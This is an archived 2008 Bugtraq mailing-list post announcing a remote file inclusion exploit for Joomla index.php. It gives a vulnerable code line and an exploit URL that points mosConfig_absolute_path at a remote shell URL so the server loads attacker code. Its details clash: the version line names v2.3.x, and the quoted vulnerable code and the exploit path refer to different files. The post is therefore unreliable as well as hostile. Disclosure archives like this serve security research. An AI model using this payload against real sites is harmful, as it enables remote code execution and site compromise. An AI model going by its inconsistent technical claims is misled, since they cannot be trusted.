lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 8 Feb 2008 15:49:42 -0000
From: alex_zooz_zooz@...mail.com
To: bugtraq@...urityfocus.com
Subject: Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit

#==============================================================================================
#Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit
#===============================================================================================
#                                                                         
#Critical Level : Dangerous                                               
#                                                                         
#        
#                                                                         
#Version : v2.3.1 & v2.3.0                                               
#                                                           
#================================================================================================
#Bug in : Index.php
#
#Vlu Code :
#--------------------------------
#     include_once($config['path_src_include'] . "common.inc.php");
#   
#
#================================================================================================
#
#Exploit :include( $mosConfig_absolute_path .'/offlinebar.php'
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?mosConfig_absolute_path=http//www.shellurl.com.com
#
#
#================================================================================================
#Discoverd By :  Fegla
#
#Conatact : alex_zooz_zooz[at]hotmail.com
#
#GreetZ :  Sub-Code   ,ShikaA  , Wizard CC

==================================================================================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ